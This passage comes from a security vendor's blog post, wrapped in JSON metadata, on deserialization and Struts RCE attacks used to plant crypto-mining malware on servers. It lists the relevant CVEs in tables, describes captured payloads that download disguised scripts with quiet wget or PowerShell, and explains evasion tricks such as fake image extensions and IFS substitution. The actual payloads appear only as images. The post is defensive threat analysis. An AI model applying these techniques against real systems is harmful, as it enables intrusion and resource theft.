deserialization \nCVE-2017-10271 | 21/06/2017 | Vulnerability in the Oracle WebLogic Server allows execution of arbitrary code due to insufficient sanitizing of user supplied inputs in the wls-wsat component \nCVE-2017-9805\n\n | 21/06/2017 | The REST Plugin in Apache Struts uses an XStreamHandler with an instance of XStream for deserialization without any type filtering, which can lead to remote code execution when deserializing XML payloads. \nCVE-2017-7504 | 05/04/2017 | The HTTPServerILServlet.java in JMS allows remote attackers to execute arbitrary code via crafted serialized data because it does not restrict the classes for which it performs deserialization \n \n_Figure 1: CVEs related to insecure deserialization_\n\nIn order to understand the magnitude of these vulnerabilities, we analyzed attacks from the past three months (October to December of 2017) that try to exploit insecure deserialization. A key observation is the _steep_ increase of deserialization attacks in the past few months, as can be seen in the Figure 2.\n\n \n_Figure 2: Insecure deserialization attacks over the course of three months_\n\nMost of the attackers used no attack vectors other than insecure deserialization. We noticed that each attacker was trying to exploit different vulnerabilities, with the above-mentioned CVEs being the most prevalent.\n\nFor a full list of CVEs related to insecure deserialization from the past few years see Figure 3.\n\n**Name** | **Relevant System** | **Public Exploit** | **Name** | **Relevant System** | **Public Exploit** \n---|---|---|---|---|--- \nCVE-2017-9844 | SAP NetWeaver | Yes | CVE-2016-2170 | Apache OFBiz | No \nCVE-2017-9830 | Code42 CrashPlan | No | CVE-2016-2003 | HP P9000, XP7 Command View Advanced Edition (CVAE) Suite | No \nCVE-2017-9805 | Apache Struts | Yes | CVE-2016-2000 | HP Asset Manager | No \nCVE-2017-7504 | Red Hat JBoss | Yes | CVE-2016-1999 | HP Release Control | No \nCVE-2017-5878 | Apache OpenMeetings | Yes | CVE-2016-1998 | HP Service Manager | No \nCVE-2017-5645 | Apache Log4j | No | CVE-2016-1997 | HP Operations Orchestration | No \nCVE-2017-5641 | Apache BlazeDS | Yes | CVE-2016-1986 | HP Continuous Delivery Automation | No \nCVE-2017-5586 | OpenText Documentum D2 | Yes | CVE-2016-1985 | HP Operations Manager | No \nCVE-2017-3159 | Apache Camel | Yes | CVE-2016-1487 | Lexmark Markvision Enterprise | No \nCVE-2017-3066 | Adobe ColdFusion | Yes | CVE-2016-1291 | Cisco Prime Infrastructure | Yes \nCVE-2017-2608 | Jenkins | Yes | CVE-2016-0958 | Adobe Experience Manager | No \nCVE-2017-12149 | Red Hat JBoss | Yes | CVE-2016-0788 | Jenkins | Yes \nCVE-2017-11284 | Adobe ColdFusion | No | CVE-2016-0779 | Apache TomEE | No \nCVE-2017-11283 | Adobe ColdFusion | No | CVE-2016-0714 | Apache Tomcat | No \nCVE-2017-1000353 | CloudBees Jenkins | Yes | CVE-2015-8765 | McAfee ePolicy Orchestrator | No \nCVE-2016-9606 | Resteasy | Yes | CVE-2015-8581 | Apache TomEE | No \nCVE-2016-9299 | Jenkins | Yes | CVE-2015-8545 | NetApp | No \nCVE-2016-8749 | Jackson (JSON) | Yes | CVE-2015-8360 | Atlassian Bamboo | No \nCVE-2016-8744 | Apache Brooklyn | Yes | CVE-2015-8238 | Unify OpenScape | No \nCVE-2016-8735 | Apache Tomcat JMX | Yes | CVE-2015-8237 | Unify OpenScape | No \nCVE-2016-7462 | VMWare vRealize Operations | No | CVE-2015-8103 | Jenkins | Yes \nCVE-2016-6809 | Apache Tika | No | CVE-2015-7501 | Red Hat JBoss | Yes \nCVE-2016-5229 | Atlassian Bamboo | Yes | CVE-2015-7501 | Oracle Application Testing Suite | No \nCVE-2016-5004 | Apache Archiva | Yes | CVE-2015-7450 | IBM Websphere | Yes \nCVE-2016-4385 | HP Network Automation | No | CVE-2015-7253 | Commvault Edge Server | Yes \nCVE-2016-4372 | HP iMC | No | CVE-2015-6934 | VMWare vCenter/vRealize | No \nCVE-2016-3642 | Solarwinds Virtualization Manager | Yes | CVE-2015-6576 | Atlassian Bamboo | No \nCVE-2016-3461 | Oracle MySQL Enterprise Monitor | Yes | CVE-2015-6555 | Symantec Endpoint Protection Manager | Yes \nCVE-2016-3427 | JMX | Yes | CVE-2015-6420 | Cisco (various frameworks) | No \nCVE-2016-3415 | Zimbra Collaboration | No | CVE-2015-5348 | Apache Camel | No \nCVE-2016-2510 | Red Hat JBoss BPM Suite | No | CVE-2015-5254 | Apache ActiveMQ | No \nCVE-2016-2173 | Spring AMPQ | No | CVE-2015-4852 | Oracle WebLogic | Yes \nCVE-2016-2170 | Apache OFBiz | No | CVE-2015-3253 | Jenkins | Yes \nCVE-2016-2003 | HP P9000, XP7 Command View Advanced Edition (CVAE) Suite | No | CVE-2012-4858 | IBM Congnos BI | No \n \n_Figure 3: CVEs related to insecure deserialization_\n\n## Deserialization Attacks in the Wild\n\nMost of the attacks that we saw are related to byte-stream serialization of Java objects. Also, we saw some attacks related to serialization to XML and other formats, see Figure 4.\n\n \n_Figure 4: Distribution of vulnerabilities over different serialization formats_\n\nIn the following attack (see Figure 5) the attacker is trying to exploit CVE-2017-10271. The payload is sent in the HTTP request\u2019s body using a serialized Java object through XML representation.\n\n[![Attack vector containing serialized java array into XML fig 5](https://www.imperva.com/blog/wp-content/uploads/2018/01/Attack-vector-containing-serialized-java-array-into-XML-fig-5.png)](<https://www.imperva.com/blog/wp-content/uploads/2018/01/Attack-vector-containing-serialized-java-array-into-XML-fig-5.png>)\n\n_Figure 5: Attack vector containing a serialized java array into an XML_\n\nThe fact that this is a Java array can be seen by the hierarchical structure of the parameters, with the suffix of **\u201cjava/void/array/void/string\u201d**. The attacker is trying to run a bash script on the attacked server.\n\nThis bash script tries to send an HTTP request using \u201cwget\u201d OS command, download a shell script disguised as a picture file (note the jpg file extension) and run it. Few interesting notes can be made examining this command:\n\n * The existence of shell and \u201cwget\u201d commands indicate that this payload is targeting Linux systems\n * Using a picture file extension is usually done to evade security controls\n * The **\u201c-q\u201d** parameter to \u201cwget\u201d stands for \u201cquiet\u201d, this means that \u201cwget\u201d will have no output to the console, hence it will be harder to note that such a request was even made. Once the downloaded script runs the server is infected with a crypto mining malware trying to mine Monero digital coins (a crypto currency similar to Bitcoin).\n\nThe next script (see Figure 6) tries to exploit the same vulnerability, but this time the payload is targeting Windows servers using cmd.exe and Powershell commands to download the malware and run it.\n\n[![Attack vector infect Windows server with crypto mining malware fig 6](https://www.imperva.com/blog/wp-content/uploads/2018/01/Attack-vector-infect-Windows-server-with-crypto-mining-malware-fig-6.png)](<https://www.imperva.com/blog/wp-content/uploads/2018/01/Attack-vector-infect-Windows-server-with-crypto-mining-malware-fig-6.png>)\n\n_Figure 6: Attack vector trying to infect Windows server with crypto mining malware_\n\nThis indicates that there are two different infection methods for Windows and Linux server, each system with its designated script.\n\nAnother example is the following payload (Figure 7) that we pulled from an attack trying to exploit a [deserialization vulnerability](<http://seclists.org/oss-sec/2016/q1/461>) with a Java serialized object.\n\n[![Attack vector containing java serialized object](https://www.imperva.com/blog/wp-content/uploads/2018/01/Attack-vector-containing-java-serialized-object.jpg)](<https://www.imperva.com/blog/wp-content/uploads/2018/01/Attack-vector-containing-java-serialized-object.jpg>)\n\n_Figure 7: Attack vector containing a Java serialized object trying to download a crypto miner_\n\nThe \u201cbad\u201d encoding is an artifact of Java serialization, where the object is represented in the byte stream.\n\nStill, we can see a script in plain text marked in yellow. Shown as an image below is a variable that defines an internal field separator, where in this case it is just a variable for space. The variable is probably used instead of a space to try to make the payload harder to detect.\n\n[![](https://www.imperva.com/blog/wp-content/uploads/2018/01/insert-into-paragraph.jpg)](<https://www.imperva.com/blog/wp-content/uploads/2018/01/insert-into-paragraph.jpg>)\n\nJust as in the previous examples, this Bash script targets Linux servers that send an HTTP request using \u201cwget\u201d to download a crypto miner.\n\n## Beyond Insecure Deserialization\n\nThe common denominator of the attacks above is that attackers are trying to infect the server with a crypto mining malware by using an insecure deserialization vulnerability. However insecure deserialization is not the only method to achieve this goal.\n\nBelow (Figure 8) we see an example of another attack payload, this time at the \u201cContent-Type\u201d header.\n\n[![Attack vector using RCE vulnerability of Apache Struts fig 8](https://www.imperva.com/blog/wp-content/uploads/2018/01/Attack-vector-using-RCE-vulnerability-of-Apache-Struts-fig-8.jpg)](<https://www.imperva.com/blog/wp-content/uploads/2018/01/Attack-vector-using-RCE-vulnerability-of-Apache-Struts-fig-8.jpg>)\n\n_Figure 8: Attack vector using an RCE vulnerability of Apache Struts_\n\nThis attack tries to exploit **CVE-2017-5638**, a well-known RCE vulnerability related to Apache Struts which was published in March 2017 and was covered in a [previous blog post](<https://www.imperva.com/blog/2017/03/cve-2017-5638-new-remote-code-execution-rce-vulnerability-in-apache-struts-2/>).\n\nWhen it was originally published we saw no indications of crypto miners in the attacks\u2019 payloads related to this CVE, and most of the payloads were reconnaissance attacks.\n\nHowever, in this attack the payload (marked in yellow above) is very similar to the payload from the previous example. Using the same remote server and the exact same script, it infected the server with crypto mining malware.\n\nThis old attack method with a new payload suggests a new trend in the cyber arena \u2013 attackers try to exploit RCE vulnerabilities, new and old, to turn vulnerable servers into crypto miners and get a faster ROI for their \u201ceffort\u201d.\n\n## Recommendations\n\nGiven the many new vulnerabilities related to insecure deserialization that were discovered this year, and its appearance in the OWASP top 10 security risks, we expect to see newer related vulnerabilities released in 2018. In the meantime, organizations using affected servers are advised to use the latest patch to mitigate these vulnerabilities.\n\nAn alternative to manual patching is virtual patching. Virtual patching actively protects web applications from attacks, reducing the window of exposure and decreasing the cost of emergency patches and fix cycles.\n\nA WAF that provides virtual patching doesn\u2019t interfere with the normal application workflow, and keeps the site protected while allowing the site owners to control the patching process timeline.\n\nLearn more about how to protect your web applications from vulnerabilities with [Imperva WAF solutions](<https://www.imperva.com/products/application-security/web-application-firewall-waf/>).", "modified": "2018-01-24T17:45:08", "published": "2018-01-24T17:45:08", "id": "IMPERVABLOG:4F187FDBA230373382F26BA12E00F8E7", "href": "https://www.imperva.com/blog/2018/01/deserialization-attacks-surge-motivated-by-illegal-crypto-mining/", "type": "impervablog", "title": "Deserialization Attacks Surge Motivated by Illegal Crypto-mining", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}]}